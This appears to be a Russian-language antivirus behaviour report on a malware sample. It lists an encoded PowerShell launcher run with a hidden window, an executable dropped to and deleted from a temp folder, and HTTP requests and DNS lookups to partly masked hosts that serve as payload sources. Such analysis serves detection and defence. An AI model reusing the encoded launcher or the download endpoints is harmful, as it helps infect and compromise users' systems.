Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGwAOQAxAG0AdABwAD0AKAAnAFoAJwArACcAaABnADAAZgA3ACcAKwAnADgAJwApADsALgAoACcAbgBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAHYAOgBUAGUAbQBwAFwATwBGAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\office2019\y96kxi.exe
Удаляет следующие файлы
- %TEMP%\office2019\y96kxi.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://we###dfuse.com/wp-content/l/
- http://we###dfuse.com/wp-admin/setup-config.php
- http://in###nix.com/bteag/zEx/
- http://x.##2.us/x.cer
- http://bl##.hlwen.com/home/U/
- http://am##-py.com/amvp/WZA/
UDP
- DNS ASK we###dfuse.com
- DNS ASK in###nix.com
- DNS ASK x.##2.us
- DNS ASK bl##.hlwen.com
- DNS ASK mi##dev.net
- DNS ASK am##-py.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGwAOQAxAG0AdABwAD0AKAAnAFoAJwArACcAaABnADAAZgA3ACcAKwAnADgAJwApADsALgAoACcAbgBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBuAHYAOgBUAGUAbQBwAFwATwBGAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)
